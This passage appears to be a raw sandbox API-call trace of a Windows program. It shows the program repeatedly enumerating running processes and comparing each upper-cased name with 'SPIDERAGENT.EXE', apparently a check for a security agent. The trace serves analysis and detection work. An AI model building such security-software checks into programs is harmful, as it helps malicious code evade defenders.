CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.411] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.411] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.411] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.411] lstrlenW (lpString="svchost.exe") returned 11 [0163.411] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.411] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.411] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.412] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.412] lstrlenW (lpString="svchost.exe") returned 11 [0163.412] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.412] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.412] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.413] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.413] lstrlenW (lpString="svchost.exe") returned 11 [0163.413] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.413] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.413] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.414] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.414] lstrlenW (lpString="audiodg.exe") returned 11 [0163.414] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.414] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.414] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.414] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.414] lstrlenW (lpString="svchost.exe") returned 11 [0163.414] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.414] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.414] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.415] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.415] lstrlenW (lpString="svchost.exe") returned 11 [0163.415] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.415] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.415] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.416] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.416] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.416] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.416] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.416] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.417] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.417] lstrlenW (lpString="svchost.exe") returned 11 [0163.417] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.417] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.417] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.417] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.417] lstrlenW (lpString="taskhost.exe") returned 12 [0163.417] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.417] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.417] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.418] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.418] lstrlenW (lpString="taskeng.exe") returned 11 [0163.418] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.418] lstrcmpW (lpString1="TASKENG.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.418] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.419] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.419] lstrlenW (lpString="dwm.exe") returned 7 [0163.419] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.419] lstrcmpW (lpString1="DWM.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.419] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.420] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.420] lstrlenW (lpString="explorer.exe") returned 12 [0163.420] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.420] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.420] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.420] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.420] lstrlenW (lpString="taskeng.exe") returned 11 [0163.420] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.420] lstrcmpW (lpString1="TASKENG.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.420] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.421] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.421] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.421] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.421] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.421] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.422] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.422] lstrlenW (lpString="taskhost.exe") returned 12 [0163.422] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.422] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.422] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.423] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.423] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.423] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.423] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.423] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.423] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.423] lstrlenW (lpString="tri.exe") returned 7 [0163.423] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.423] lstrcmpW (lpString1="TRI.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.423] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.424] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.424] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.424] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.424] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.424] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.425] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.425] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.425] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.425] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.425] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.426] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.426] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.426] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.426] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.426] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.426] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.426] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.426] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.426] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.426] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.427] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.427] lstrlenW (lpString="isolation.exe") returned 13 [0163.427] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.427] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.427] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.428] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.428] lstrlenW (lpString="abc.exe") returned 7 [0163.428] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.428] lstrcmpW (lpString1="ABC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.428] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.428] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.428] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.429] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.429] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.429] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.429] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.429] lstrlenW (lpString="english_performing.exe") returned 22 [0163.429] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.429] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.429] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.430] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.430] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.430] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.430] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.430] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.431] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.431] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.431] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.431] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.431] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.431] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.431] lstrlenW (lpString="volume.exe") returned 10 [0163.431] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.431] lstrcmpW (lpString1="VOLUME.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.431] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.432] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.432] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.432] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.432] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.432] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.433] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.433] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.433] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.433] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.433] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.434] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.434] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.434] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.434] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.434] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.434] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.434] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.434] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.434] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.434] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.435] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.435] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.435] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.435] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.435] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.436] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.436] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.436] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.436] lstrcmpW (lpString1="EXCEL.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.436] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.437] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.437] lstrlenW (lpString="svchost.exe") returned 11 [0163.437] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.437] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.437] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.438] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.438] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.438] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.438] lstrcmpW 